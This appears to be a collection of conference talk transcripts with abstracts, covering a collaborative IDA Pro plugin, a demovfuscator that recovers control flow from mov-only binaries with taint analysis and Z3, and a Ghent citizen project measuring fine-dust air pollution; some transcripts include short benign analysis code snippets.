way. So now we can go back and start redefining code and let the auto analyzer do its stuff. But you see they're still able to sync the same events even though IDA is creating a ton of actions that it's doing to its own database. So now we're starting to undefine and define selections of bytes, which is also a little interesting. It's different. Undefining and defining a selection is actually different from just hitting U and, like, undefining, you know, from where you are downwards. So, yeah, it's cool. You know, we're screwing up all the code here, but it's in sync, right? That's what we care about. We're trying to minimize divergences as much as possible. So, yep. So that was a little bit more advanced. So, anyway, some of the secrets for the event syncing that a lot of people have struggled with. I wanted to put more slides in here, but I ran out of time. So you only get one slide of some of the secret sauce, which is: you have to really respect IDA's auto analyzer. So it might not have been the best design decision way back. I know I've seen Ilfak talk about how way back in the day they were hoping to have an AI built into IDA to help, you know, assist you with reverse engineering and whatnot.
And so it's, you really have to respect it and, you know, don't mess with it. Like when it needs to do stuff, you let it do stuff and you back off. And so the other, you know, the other super secret hint is hook and utilize the Qt subsystem. Like it is there for the taking and you can do almost anything you want to IDA. Few people realize that, but IDA is so, so customizable. You could change just about any aspect. If you guys have seen some of the crazy Olly, like Olly, you know, customizations people have done for OllyDbg and whatnot. Like crazy menus and whatnot. Like you could do the same exact thing with IDA. Few people actually utilize IDA's API or, you know, the power of the Qt subsystem. So also the last point is providing context to the signals and hooks and events that are made available in IDA. CollabREate and some of the other projects just captured them and broadcast them. But the thing is some of those individual signals don't really mean a whole lot. You need to understand them in context. And I wish I had time to put together a diagram to better explain how we handle this. But our event syncing stuff, how we kind of deal with and watch and understand the auto analyzer and what the user is doing, is we actually use a finite state machine to walk through. We walk through this finite state machine based on the signals we're receiving. So one signal could be interpreted in different ways. It could mean five different things, but it really depends on the context that you capture it in. And that's how we try and interpret things without being bitten by the auto analyzer. Yeah. So, all right, let's keep moving through some of the modules. So replay. Very useful if your friend is doing a bunch of reversing and you went to sleep or something and now he's done a bunch of changes. And you want to come back online and get those changes. So basically what we're showing here is we're going to make changes to one of the databases that's connected. And the other one is currently not open or connected. So then once we've made some changes, we will connect the other one and it will sync up to the state of the first one. And we will be back in sync with the other one. You can see the changes happening in the background and now we're back in sync again. And so if you think, you might think, oh, well, what if there's a ton of events? Well, we have a system where snapshots of the IDB get uploaded. You download that and then rebase from there. So it's a very small number of events that you actually have to sync. And so it really keeps you able to, or you're really able to keep up with that. Yeah. So we're already running low on time. So we got to keep moving. So, status bar. So in IDA, I saw the status bar at the bottom and I'm like, wow, there's so much potential. So I started doing crazy things with Qt and I was like, I want to put stuff down there. And so I did. So I put like your server status. You can easily select which server you want to connect to. In case you have multiple, maybe you play with multiple CTF teams or companies or whatever. So you could just right click this nice little thing, pick your server, whatnot, and go. But we got to keep moving. So invites. So I give you a toast, right? Like we love toast notifications. So imagine if you can right click somewhere in the database and be like, hey, like here I am chatting across the room. Hey, Nick, I found the bug. It's in this function. And he's like, oh, what function is that?
I'm not going to say 0x41bf7 3f anymore. I just say I right click and I say invite Nick here and he just gets a notification. Boom. You can just click that notification and his database gets flown over there. Alternatively, you can also, you know, if you were busy reversing something, you have your nice little Q of the notifications that came in. So you're a little in box. This is kind of what the colors mean. But we got to keep going. So cursors. I said I want to put stuff on the nav band. So the text stories gives you two APIs. One of them refreshes the nav band. The other lets you draw a single line of pixels to the nav band. The refresh API doesn't actually work. So I had one. I had one API and the QT subsystem to do this with. So you can see these are the different users we're working with. If you hover over them, you actually can see their names, which is fun. You can kind of see where people are working in the binary and spread out that way. You know, practically nobody will probably ever use this, but this was part of the vision. We're trying to establish a user experience, right? Yeah. Hex rays. So we said we want to do hex rays. Started working on it. I haven't worked on it in a little while. It is definitely feasible. This kind of demos some of it. This just a little bit old. Yeah. So we are doing some different like type changes and structural manipulation in the actual hex ray window and it's syncing up to the other person who's also within a hex rays window. And so that way you don't have to work at assembly level if you don't want. Yeah. So I mean, we all use hex rays so much nowadays. It's a skill to be good at it. A lot of people just press F5 and are like, oh, this is unreadable. But, you know, there's, you know, we're working on silently syncing hex rays. It's definitely very feasible. If you guys could open up the microcode, that would be great. Or some more SDK or APIs for it. That'd be awesome. I've had to reverse hex rays and, you know, the hex rays plug itself in IDA at some times to understand how some of the APIs work. Anyway, yeah. So now I'm very quick. Just want to show the web server. This is because IDA GUIs can be a little tricky. Maybe you don't want to open IDA to like add someone to a project or something. So, yeah. So what we have is it's basically a very simple web server here. You can see like all the projects that you are on. You can see recent actions that have happened. Here's like an overview of the projects. You can see information like, oh, these all have sync enabled. That one's private. So on you can get like a view of the directories so that you can kind of visualize that better. And then further, you can go to a project and like see very detailed information about what's been happening in it. So you can like get an idea of how the reversing is going and as well as be able to see like all the IDBs that have been uploaded in case you want to like take one out of the system and use it personally or something. Yeah. And then so the other thing is we really want like fine grain control through the web interface because it's much easier to implement that kind of like control through all the different forms and everything. So you're able, this is the easiest way to add users to projects, change project details and everything so you don't have to go into IDA to those kind of tasks that don't actually involve reverse engineering. So yeah, that's pretty much the web server. Yeah. 
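One small implementation note on the invite toasts shown earlier: since IDA's UI is Qt, a bare-bones toast can be done with the bundled Qt bindings along these lines. This is not Solidarity's actual widget, only a sketch, and it assumes a PyQt5-based IDA build (older builds ship PySide, where the imports differ).

```python
from PyQt5 import QtCore, QtWidgets

def toast(text, msec=4000):
    """Show a small frameless notification in the corner of the screen."""
    label = QtWidgets.QLabel(text)
    label.setWindowFlags(QtCore.Qt.ToolTip | QtCore.Qt.FramelessWindowHint)
    label.setStyleSheet("background: #333; color: white; padding: 8px;")
    geom = QtWidgets.QApplication.desktop().availableGeometry()
    label.adjustSize()
    label.move(geom.right() - label.width() - 20,
               geom.bottom() - label.height() - 20)
    label.show()
    # keep a reference so it is not garbage collected, then auto-close
    QtCore.QTimer.singleShot(msec, label.close)
    return label

# toast("nick invited you to 0x41BF73F")   # hypothetical invite message
```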
So yeah, there's a, you know, there's actually a lot of, there's a lot more that we did not cover. We only have 30 minutes. So we, you know, we're out of time basically. We showed a bunch. There's a lot more planned. We also like to release as a beta. We submitted for a black hat and we're hoping to release it or beta it out then, but that didn't pan out. So it'll be betaed soon. That's all we can promise. There's a lot of other really cool stuff that we wish we could have shown you guys, but hopefully soon. So, you know, follow us on Twitter. The website we're going to push up soon just, you know, so there's some central resource. And then we'll have all the demos that we showed today if you want to look at them. Yeah. And we'll, you know, we'll put these slides up and yeah. So that's all we've got. Yeah. Yeah. Yeah. So, yeah. So the, we were as mentioned earlier, how the question. Yes. Yeah. Sorry. He was wondering if there was some sort of like version control for the actual like databases as you're going along case somebody like completely messes up a database and you can't undo it. So as I mentioned earlier, we have a system that will like make snapshots of IDBs as you're going on so that you don't have to sync up as many events. So you could easily tell solidarity to use one of those as the most recent one and then just move on from there. And the other ones will just be like put aside and you can download them and do whatever if you want, but they won't be used for anything anymore. Yep. Yep. So, you know, we maintain a history of all the events that are flying over the server that, you know, are more detailed, precise events, not just the stuff that was spewed kind of like collaborate. We, there, we maintain this whole log of them as well as various snapshots of databases that automatically get uploaded from a user in that session. So every 500 events, let's say a database gets uploaded. And so anytime someone else joins that session now that database gets pulled down and they, you know, they join the session that database will get pulled down and then any events they have missed that have been, you know, occurred since then will be played, you know, which is going to be. Yeah, and you can do the same thing with any of the databases pretty much that have been in like the snapshots and that way you could basically go back in time if you really need to. Yep. So any other questions? Yeah. So divergences offline is just difficult, right? Like there is no good solution to that. So, so one thing if you have to make a lot of changes offline, you can basically create that new snapshot then and people who want to work from that kind of like fork of the thing can then go on from there. But if you're the idea is you're doing most of the stuff online. So ideally you would be able to connect and send like record the events that you've been making. Otherwise, the server doesn't know what you've been doing. Yeah, the simple answer is basically get forked. So, so yeah, I don't, I don't think we really have any more time. Unfortunately, we're already over. But, you know, hit us up will be around for the rest of the day. Or otherwise, yeah, hit us on Twitter. Yeah. Yeah.
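As a footnote to the snapshot-plus-replay answer above, bringing a freshly downloaded snapshot up to date is conceptually just applying an ordered event log. A rough IDAPython-flavored sketch, assuming events shaped like the rename messages sketched earlier and using IDA 6.x-era idc names; everything Solidarity does for routing and conflict handling is glossed over.

```python
import idaapi
import idc

def apply_event(ev):
    # apply one logged event to the local database
    if ev["type"] == "rename":
        idc.MakeName(ev["ea"], str(ev["name"]))
    elif ev["type"] == "comment":
        idc.MakeComm(ev["ea"], str(ev["text"]))
    # ... other event types elided ...

def replay(events, last_applied_id):
    """Apply every event newer than the snapshot, in order."""
    for ev in sorted(events, key=lambda e: e["id"]):
        if ev["id"] <= last_applied_id:
            continue              # already baked into the snapshot
        apply_event(ev)
    idaapi.refresh_idaview_anyway()
```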
|
Reverse engineering is an exercise of exploration and digital cartography. Researchers slowly unearth bits and pieces of a puzzle, putting them together to better understand the bigger picture. Binaries, like puzzles, can be put together much faster in collaboration with others. And with services such as Google Docs, Office 365, or Etherpad, it is easy to recognize the power and effectiveness of real-time collaboration in the digital space. Unfortunately, reverse engineering as many know it today is almost exclusively an individual experience. Our present reversing tools offer little in the way of collaboration among multiple users. This can make reverse engineering tedious and wasteful in a fast-paced team setting. In this talk we’ll be publicly unveiling Sol[IDA]rity, the newest collaborative solution for the popular disassembler IDA Pro. What started as a simple plugin to sync IDA databases between users in real-time, soon evolved into an interconnectivity platform for IDA with endless potential. Join us for a glimpse at the latest generation of collaborative reverse engineering.
|
10.5446/32753 (DOI)
|
All right, we're ready to get started now with Julian and Clemens. Movfuscator be gone. As many of you know, this is a follow-up talk on the movfuscator talk done by Chris Domas last year. My first quick question would be: who attended that talk or saw it recorded online? Okay. That's quite a good number. Actually quite a bit. Our subtitle is "recovering from soul-crushing RE nightmares", which is quite a reference to last year's talk. As you can see, this is a work in progress, so we're still writing work-in-progress software, a demovfuscator. We would like to stress the fact that this is not a personal attack on Chris Domas. Also we would like to say in advance that our demovfuscator does resubstitution of those mov instructions very carefully, I would say. All right. A little bit about us. Who are we actually? We are, well, mainly CTF players. We play for a team from Germany called H4x0rPsch0rr, and we invest a lot of time into solving crazy exploitation, reverse engineering, and cryptography tasks. Whenever we are not playing CTF, then, well, I am trying to get a PhD in the field of program analysis, low-level program analysis, and demovfuscation. Clemens just finished his bachelor's thesis. He also had the doubtful honor of writing the thesis on demovfuscation, so he probably now knows that mov code very well and can elaborate a little bit later. Okay. To get us in, I will try to cover the movfuscator at a high level, such that you know how it works and how it is made up internally. So the story of movfuscation is probably like this. There is a strange discipline amongst computer scientists to find Turing completeness where you wouldn't expect it. And the original paper on this was by Stephen Dolan in 2013, where he showed that even if you remove all instructions from the Intel x86 instruction set except the mov instruction, then you are still not losing Turing completeness, which is kind of surprising, I would say. And then two years later Christopher Domas came and actually implemented a compiler that did that, and that was released at recon 2015 last year. And he did that in two ways. So he had one version, the movfuscator 1.0, which translated from Brainfuck to x86 mov, which is not so surprising because Brainfuck is quite low level, but he also spent a great amount of time writing a C to x86 mov compiler, which is basically implemented as a virtual machine, and we will cover some of the internal workings right now. So we have the two references there if you are interested to read up on that. So let's assume we have a program that looks like this. So five basic blocks that are happily jumping to each other, and at basic block three, assume that there is a loop. And then what many of you might know from malware or from industry-standard obfuscators is something like this, called control flow flattening, where the obfuscator inserts a dispatcher that actually then does the basic block scheduling for you. So the flattened version clearly conceals how many possible paths there are through the program, and you can't tell anymore which basic block is scheduled after which basic block. And movfuscation now goes the exact opposite way and creates something like this. So instead of flattening it, it does something we call linearization, which just aligns all basic blocks into one linear block that loops infinitely. So how is that implemented internally?
Well, there is this static initialization stub, which basically registers two signal handlers. One is for SIGILL, which is basically a trick where the program is its own signal handler. That means that basic block four, in order to jump to basic block zero in that image, does not have to trigger an explicit jump, but can instead just trigger a SIGILL. In Domas' case it's a mov into a segment register, well, to start execution over again. And of course, those signals have to nest. The other one is, of course, that you don't want to lose your ability to talk to the operating system, which is why he registers another signal handler for the segmentation fault, which basically jumps to a dispatcher which then calls external library functions. So it does that by triggering that fault. So in the context of movfuscation, dereferencing zero means: well, do a library call. Okay, to best understand how this is possible at all, we have a, well, quite verbose high-level C program here. And I know that slides and code don't like each other very much. But what this program does is it calculates the factorial of the number that is passed in argv[1]. If you compile the program as printed on the left, you get a control flow graph as depicted on the right. So how is that done? Well, one observation is that each instruction of each basic block obviously needs to be executed each time it is passed, right? So whenever that loop retriggers, we have to execute all instructions again. And the problem is that not all instructions should manipulate our state. So the main trick of movfuscation is that whenever you introduce a variable, you actually introduce two variables. You introduce an array with two entries, and the first entry of that array is a discard location with trash data, and the second entry, at index one, is the real data you're interested in. If you follow that idea, then you can write a program like you can see in that do-while loop from line 12 to 24, which basically, well, takes a state variable, a global state, and evaluates that state; in our case we have state zero and state one. And if it's true, then the assignment on the left-hand side (the i and the one you can see in line 13) is done to the real data, and if it's not, then the assignment is done to the scratch data. And well, if you apply that iteratively, then you get that program calculating the factorial. Quite interesting. And in the context of movfuscation, this means that whenever we talk about something prefixed sel, we actually mean an array holding two variables, and one of those variables is scratch data. So a basic block in movfuscation always starts with a sequence that takes that target register, which is basically equivalent to the state variable we saw here, and checks (let's, for example, take a look at basic block three) whether the current basic block is the basic block that should be executed. And if it is so, then that on variable is set to true. The transformed semantics of basic block three, now written in mov code, are executed. And at the end of that basic block, there is the sequence where the basic block checks whether the next basic block should be basic block three or four; basic block three was the one that looped in the beginning. And then execution goes on. Now one thing to remark is that arithmetic using only mov is quite tricky. Domas implemented this using lookup tables.
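To make the two-slot trick concrete before the lookup tables come in, here is a minimal Python sketch of the source-level transformation just described. It is purely illustrative: it is not the movfuscator's actual output, the variable names are made up, and the final if/return merely stands in for the signal-based exit, since real movfuscated code does all of this with mov instructions alone.

```python
def movfuscated_factorial(n):
    # Every variable becomes a two-slot cell: index 0 is scratch, index 1 is real data.
    i = [0, n]
    result = [0, 1]
    state = [0, 0]  # state[1] holds the label of the block that should execute

    while True:  # the single linearized loop over all basic blocks
        # --- basic block 0: result *= i; i -= 1; pick the next block ---
        on = int(state[1] == 0)        # 1: writes hit the real slot, 0: they are discarded
        result[on] = result[1] * i[1]
        i[on] = i[1] - 1
        state[on] = 0 if i[1] > 1 else 1

        # --- basic block 1: exit (stands in for the movfuscator's syscall dispatch) ---
        on = int(state[1] == 1)
        if on:
            return result[1]

print(movfuscated_factorial(5))  # 120
```

Every block's body runs on every pass through the loop; the only thing the state decides is whether a write lands in the slot that anybody ever reads.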
So you can imagine that doing arithmetic via lookup tables for each and every possible processor instruction can blow up the binary quite a bit. And if we look at some statistics here: on the right-hand side we have vanilla compiled programs, and on the left-hand side we see the movfuscated versions. We can see that program sizes increase dramatically, by a factor of up to, well, almost 2000; note that's kilobytes versus megabytes. And execution times, because that loop has to be executed over and over again, are of course also quite awful. If you compare the SHA-256 example, which basically just hashes 10,000 bytes, it took, what's that, a factor of almost 4000 longer than the original version. So our thought when we saw that was: well, it's quite cool, but it's also very slow, right? So who would ever use that obfuscation technique in any productive way? Yeah, well, and of course we forgot about CTF organizers. So of course it didn't take long until challenges appeared during CTFs where people thought it was a nice idea to torture CTF participants and throw movfuscated binaries at them. And at that point we said, okay, no, this has to change. And if we deal with that, we deal with it properly. So there are two easy solutions that we explicitly rejected. Number one, the Brainfuck movfuscator, well, is easy because there is a one-to-one relationship from Brainfuck instructions to emitted mov instructions. You could just statically resubstitute them and you're done. The same goes for the C version, but, and that's quite cool, the original implementation of the movfuscator also has a hardening.py script lying next to it. And what it does is, well, prevent exactly those pattern-based, sort of pattern-matching based approaches. It does register renaming, it does instruction reordering, it shuffles quite some things around. So we can't do any pattern-based approach anymore, and we are really forced to look at the semantics. And how we do that is now covered by Clemens. So first of all, when we designed the demovfuscator, we had to think about what our goals were, because analyzing a movfuscated binary, as you saw, can be quite tricky, quite difficult, especially if you have to take into account that the extra hardening gets applied. So, like Julian just said, you can't statically translate it back. So we sat down and thought about what would be the main priority, and we came up with this: staring at the wall of instructions is really bad and annoying, and it would help a lot if we actually got the control flow back. That was our main objective. Apart from that, we wanted to retrieve symbols, like which table does which operation, so that if in the end you load it into IDA, you know exactly what's going on; even though you have quite an amount of instructions, you can figure out what is happening. And as the third, or lowest, priority there is replacing the lookups by their respective instructions, by the corresponding arithmetic instructions. Yeah. So those are the goals. And we recover the control flow in four stages, and every stage builds on top of the previous stage. So in every stage we acquire some knowledge we need in the next stage. In the beginning, we don't have any knowledge about the program, apart from the fact that it is movfuscated and that it contains the initialization. So we analyze the setup. After that, we have enough knowledge to retrieve all the labels.
Then we can look at where the jumps are and where they are leading. And from all this information, we can finally build the control flow graph again. And well, that was our main priority. So let's get right into it: how do we analyze the setup? As Julian mentioned, the initialization sets up two signal handlers, to do external calls and also to loop around, and it sets up the stack as well. And the interesting part is marked here as one. It is actually part of the main loop, but it is also statically in the binary, and also not prone to any hardening, because it's emitted only once, and that happens at the time when the object files get linked together, or right before that. So you won't see any hardening on this part, so parsing it is quite simple. And as you see, the on variable will be initialized here. In the first statement, the selector at position init will be set to one. And init is a variable that is statically set to one in the image of the binary, and after that, init is set to zero. That makes sure that this basic block will only be executed once, at the beginning, when the binary is first started. And then it calls main and exit. It's basically just setting up the execution of the other basic blocks. So from here, we know where sel_on is, and we also know where on is, because, well, if we have this selector, we have on as well. And on top of that, we can now recover the labels. To do this, we run over the entire binary and parse instructions using Capstone. And a label has to occur wherever a jump lands, because of the way jumps work: a mov instruction itself cannot target the instruction pointer, so it needs those entry points into labels where the execution is set to on. And they look like the code here, these two lines: you have sel_on, which is set to one under a special condition. And we now have to evaluate the condition and thereby find the label. On the right side you have an example here. We are using lookup tables, and because it's a 32-bit binary, you can't have full 32-bit lookup tables, so it is split into multiple lookup tables, which blows the comparison up into quite a vast amount of mov instructions. And we have to put them together; that's the challenge here. Also, in the beginning we don't know what each lookup table does. So instead of seeing the equals-equals here and seeing the and here, you would just have addresses, addresses into tables. And now we have to beat the lookup tables. And what is the best way to beat lookup tables? Well, you just use lookup tables. This works for binary and Boolean operations: for binary operations, we access a specific element in the lookup table which is distinct for this lookup table, so we make sure no two lookup tables have the same value there. For Boolean operations, we calculate a score based on the results. For unary operations, we hash the tables, which works quite well. Yeah, now we have figured out which lookup table fits to which address, and now we can translate back. And now we have here the stream of instructions, which is exactly what I showed before. You might be able to identify the equality lookups at the end. No? Well, I guess so. The worst part is, we still have to teach our computer how all the instructions work together. So what we do is, we start at the end. We know that when we assign one to sel_on, the result A is some kind of condition. And we start there. We do a taint analysis going backwards, at first tainting A. And the way taint propagates backwards through mov code is quite obvious and quite easy to implement.
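As an illustration of that backward taint step, here is a deliberately simplified Python sketch. It is not the demovfuscator's actual code, which works on real Capstone-disassembled operands and has to reason about memory addressing; here every mov is reduced to a destination plus the list of locations it reads.

```python
# Each instruction is modelled as (dst, [srcs]): "mov dst, <something read from srcs>".
def backward_slice(insns, start):
    tainted = {start}
    slice_ = []
    for dst, srcs in reversed(insns):
        if dst in tainted:
            slice_.append((dst, srcs))  # this mov defines a tainted value,
            tainted.discard(dst)        # so the taint moves away from dst
            tainted.update(srcs)        # and onto everything that was read
    return list(reversed(slice_)), tainted

# Toy program: sel_on is written from eax, which was loaded from a lookup
# table indexed by edx, which in turn was loaded from the target cell.
program = [
    ("edx", ["target"]),           # mov edx, [target]
    ("ebx", ["junk"]),             # unrelated, never ends up in the slice
    ("eax", ["eq_table", "edx"]),  # mov eax, [eq_table + edx*4]
    ("sel_on", ["eax"]),           # mov [sel_on], eax
]
slice_, leaves = backward_slice(program, "sel_on")
print(slice_)   # the three movs that actually feed sel_on
print(leaves)   # {'eq_table', 'target'}: the inputs of the condition
```

The slice plus its leaf inputs is exactly the material that gets handed to the solver in the next step.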
So it works really well, and we can generate a graph out of it. And this looks way more manageable, I think you agree. Now we still have a graph, and we still have to handle it somehow. So what we do next is take this graph, translate it into an expression, and feed it into an automatic theorem prover, namely Z3. And with this automatic theorem prover we ask: well, what value does target have to take so that A evaluates to one? So under which condition will sel_on be set to one? And it will output us a constant: target just has to be equal to the label. So we then have the label, and we just remember where the label was and what the label is. So the virtual address and, well, the label. And this brings me to the third point: we have to identify jump targets. All those instructions have in common that they access our target. So we do it very similarly to the analysis of the labels. We start from the selector of the target and see if it's toggled under some condition, like you see in the conditional jump; all the others have no condition, because unconditional jumps will always be executed, returns will always be executed, indirect jumps will always be executed. And then we also have to acquire the label, which we find in the subsequent instruction, or it could be something more complex, like in the indirect or return case. And it's not easy to distinguish those two cases, but with a taint analysis of X, you end up either with a very simple case where just the stack gets dereferenced, or with something way more complex; the complex case is the indirect jump, and the one where the stack is dereferenced is obviously the return. And we then remember the position of the jump and where it leads us. This gives us a bunch of data. First we just have those labels and the jumps on the left side, A, B, C, D, E, F. Then we connect them in a meaningful way, such that a label just continues execution into the next block. And then we simplify the graph, and we get a control flow graph on the right. And that's all we do, all we need to do, to recover the control flow graph. Yeah, right. But so what? I mean, we don't remove all the movs; that might be the biggest concern right now. Yeah, but it has the advantage that it can still handle hardened executables. We are doing a taint analysis, so it doesn't matter how the registers are named, and it doesn't matter in which order they appear, because, well, it doesn't matter to the taint analysis; the data gets propagated all the same. Also, we get the control flow graph, which is a major help in reversing the binary in the end. We also, what I didn't cover is, we generate a patched binary, which we can then execute, and which makes looking at it in IDA or something else way more pleasant. We also generate symbols because, well, going all the way, recovering the labels and the symbols, we go over all the tables anyway, and so on the way we just generate those symbols and get them into a form that IDA can understand. So if, in the end, you load the patched binary with the symbols into IDA, you have quite a different experience than looking at the movfuscated binary. Right, and last but not least, we're using all those fancy new frameworks. So if Mr. Nguyen is sitting in the audience, I don't know, the creator of Capstone and Keystone: thanks a lot, that really helped in creating the demovfuscator. And also a thank-you flies out to Microsoft for creating the Z3 automatic theorem prover. And we actually had a demo.
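To give an idea of what that solver query can look like, here is a toy z3py version. Again, this is only a sketch under simplifying assumptions: in the real demovfuscator the expression for A is reconstructed from the identified lookup tables rather than written down by hand, and the label address below is invented.

```python
from z3 import BitVec, If, Solver, sat

target = BitVec("target", 32)

# Stand-in for the condition recovered from the taint slice: the chained
# lookup-table accesses boil down to "A is 1 exactly when target equals the label".
LABEL = 0x0804A0C0  # hypothetical basic-block label
A = If(target == LABEL, 1, 0)

s = Solver()
s.add(A == 1)                     # under which target does sel_on become 1?
assert s.check() == sat
m = s.model()
print(hex(m[target].as_long()))   # 0x804a0c0: the label of this basic block

s.add(target != m[target])        # and it is a constant: no second solution exists
assert s.check() != sat
```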
Yeah, we had a small demo, but due to ongoing problems, and due to the fact that everybody wants to go to the coffee break, I'm just quickly covering what the idea and the takeaways of that demo were. So we have this simple crackme. And I'm sure that most of you will almost instantly be able to tell what the needed input for the fgets in line 10 should be in order to get the smiley face, not the sad one. What we would have done is movfuscate this and then throw it into the demovfuscator. And then, to prove our point, we would have taken this fancy new angr binary analysis framework. And the cool thing is that angr comes with a symbolic execution engine that actually works for low-level programs. What you can then do is say: okay, whatever fgets returns is symbolic data, so treat it as a formula; then execute the full program from line 10 to line 16, apply all those transformations to the formula, and then constrain res, the result variable, to be zero. From that, you can feed it again into a theorem prover, and you will actually get the correct solution (see the sketch below). And I know it's pretty lame that we can't show that live right now. So all I can offer is, well, I have it there on my notebook, but unfortunately not on this one. Yeah, just come to us. If you're really interested in this, we invite you: please come to us after the talk and we will show you that it actually works after demovfuscating it. And one of the takeaways also is that demovfuscation takes, well, less than a second, so it's almost as fast as obfuscating it. So to conclude: this is the way you can reach us, our email addresses, also our PGP fingerprints. And of course we are open-sourcing everything. So the source code of the demovfuscator, which is by the way about 4k lines of code, so there are many, many, many things we couldn't cover. Also a summary of the demovfuscator. And if somebody wants to torture himself even more, then there's Clemens' bachelor's thesis that you might reach for, which might be quite a moving experience on 60 pages. And that's all we got for now. It covers the basics of the movfuscation more in depth, and of the demovfuscation as well. So it might be interesting to read, but it isn't necessary. This presentation covered pretty much... Just shut up. It's just, we're at that point. All right. Okay. Thank you very much. Thank you. Thank you. Bye. Bye.
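As an aside, a generic angr recipe in the spirit of the demo just described might look like the sketch below. This is not the presenters' actual script: the binary name and the smiley marker are made up, and the speakers describe a more surgical variant that symbolically executes only lines 10 to 16 and constrains the res variable directly.

```python
import angr

# Load the (hypothetical) demovfuscated crackme.
proj = angr.Project("./crackme_demov", auto_load_libs=False)

# Start at the entry point; stdin is symbolic by default, so whatever fgets
# reads is treated as a formula, as described in the talk.
state = proj.factory.full_init_state()
simgr = proj.factory.simulation_manager(state)

# Search for a state whose output contains the happy smiley instead of the sad one.
simgr.explore(find=lambda s: b":)" in s.posix.dumps(1))

if simgr.found:
    print(simgr.found[0].posix.dumps(0))  # concrete stdin bytes that solve the crackme
```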
|
After last year’s talk by Christopher Domas titled “The M/o/Vfuscator”, we spent a great amount of time analyzing the inner workings of the famous one-instruction compiler. We are happy to announce and release the (to our knowledge) first demovfuscator this year at recon0xA. This talk presents a generic way of recovering the control flow of the original program from movfuscated binaries. Our approach makes zero assumptions about register allocation or a particular instruction order, but rather adheres to the high-level invariants that each movfuscated binary needs to conform to. Consequently, our demovfuscator is also not affected by the proposed hardening techniques such as register renaming and instruction reordering. To achieve this, we use a combination of static taint analysis on the movfuscated code and a satisfiability modulo theories (SMT) solver. We successfully used our demovfuscator against several movfuscated binaries that emerged during several CTFs over the last months (Hackover CTF, 0CTF and GoogleCTF), proving that it can already handle real-world binaries different from the synthetic samples created by us. Our demovfuscator is under active development and we are working towards our next, ambitious goal: generically reversing the instruction substitution and generating a much more compact and readable result. We will share our insights on this topic as well.
|
10.5446/32400 (DOI)
|
Hello, welcome. This talk is about Adam. My name is Dag Wieers. I've been here a few times in the past, but that was five years ago, two children ago, some weight ago. But it's nice to be back. This time it's about a project that I'm involved with. Myself, I'm a freelance, well, system administrator or system engineer, so not really something that is related to this project, but anyhow. The project is a Timelab project. Timelab is an organization, a non-profit organization in Ghent, which is like a fab lab. It brings people together to work on creating stuff. They have laser cutters, 3D printers, CNC milling machines, I don't know if it's called like that in English. It was founded in 2010 out of a different organization, but they reoriented towards becoming a fab lab. And they also do projects. So from time to time, I think twice a year, they think of new projects to do and motivate people to work on those projects as volunteers. These are citizen projects in the sense that they try to motivate just citizens, not professionals, not science people. It's not paid for, so it's purely on a voluntary basis. Timelab also does workshops related to creating stuff and using the machines, and a lot of other stuff as well, also around project management and things that are also needed to have successful projects. They also do boot camps, they do Arduino jams, like 48-hour Arduino jams. And they also pay for residencies for art students or students that have a nice idea; they have to answer a call for proposals. They have, I think, two apartments where people can live. So it's usually international people that can add something to Timelab, and Timelab can also add something to their project. They also let people use their space for free if you want to have a space where you want to work. So you don't even have to be a member to make use of their space. And they have free Friday lunches. It's supported by the city of Ghent and the Flemish government, but it's not self-sufficient, so they do require you to pay something if you want to make use of their equipment on a continuous basis. Except, of course, if you're involved in one of those creation projects like I am with Adam. So what does it look like? It's something like this. It's actually much larger, but this is a view of what it looks like on a busy day. And the nice thing, obviously, is that it brings people together. So you learn a lot if you're stuck with something; you can ask anyone, about using the machines, or even technical stuff, or explaining something. So it's a bit like FrOSCon. We have a very nice logo, because we also have designers inside of Timelab, which is also nice because you can do something that looks more professional as well. Also designing, what do you call it, product design, like building cases and stuff like that. So that's very useful, because usually someone is very good at a certain thing, and here you have everything mixed. So the goal of the Adam project is actually to monitor the air quality in Ghent. Specifically in Ghent because we want to start small. But the aim is to give the user direct feedback on the air quality at the location where he is. With a little bit of delay probably, but good enough for people to understand if there is an issue with the air pollution. But another thing we would like to do is to collect this information and publish it, because we think that open data can help governments make better decisions.
And so the idea was to create a mobile device that collects this information from time to time and uploads it to a central location. Because it's raw data, the device itself doesn't do a lot of calculations or mathematical or statistical manipulation; we do that centrally, based on all the information we get. And obviously the idea is to create public awareness as well. And thanks to some of the marketing people that we also have in the project, we have a very fancy idea of trying to get to the public media, because we really want to get some airplay on television and stuff like that once we have this thing going. And why are we doing it? Because we can. But not just that. The idea itself actually originated in the fact that one of the founders of the Timelab project brought a son, a baby boy, into this world. And he had a lung problem, and he is still very sensitive to air pollution and especially to fine dust. And with this project, at this moment we are only focusing on what they call particulate matter, which is fine dust. But obviously, once we have this finished and the second revision of this device, we could add more sensors. But the question is, why did we focus on fine dust? It's because it's the least known; we have the least data on fine dust. So the usual CO or NOx or ozone, these are very easy to monitor, and there's lots of data around that. But particulate matter is really something where you need specific calibrated devices, which are quite expensive. So yeah, there's not a lot of information about it. And if there's information, it's usually an average over a long period. And the thing with air pollution is that it's not about what the average is over a year, it's what you have, where you are, today, on a continuous basis. So that's why we don't think what the government is showing is actually relevant to us, to the citizens, to everyone. So yeah. So we live in the beautiful city of Ghent, which looks like this. We think it's the most beautiful city in Europe, the world maybe. And we have a lot of bicycles; it's a bit like Amsterdam. It's a student city, a lot of students, I think 60,000 students. The population is 260,000; add those students to it and it's more than 300,000 people. And the bike is very, very much used. So our idea was to make a mobile device to put on a bike. The beautiful city also has two highways, and one highway going directly into the city, which is part of the problem, we think. And you can see that from this, this is a picture from last year; it has been renovated, while we would maybe have preferred to have it demolished instead. And I live somewhere at the end of that. So it's green, but don't let the trees fool you; it doesn't help a lot. So in the big city of Ghent, we have only two official air pollution stations. And they were strategically placed; it took, I think, more than one and a half years to decide where to put them, far away from a lot of things that create pollution. And we do meet the European levels, which, as I can show you later, are quite broad. There is an average for the whole year, so it doesn't matter how many spikes there are, and then you can go over the limit, I think, 35 times a year or something. But as I said, those yearly averages don't mean a lot, and it's micro-measurement that we actually need. So, and that's what we want to change. Obviously, like I said, it's not just particulate matter that makes up the air quality; there are other factors. But as I said, it's the least known variable.
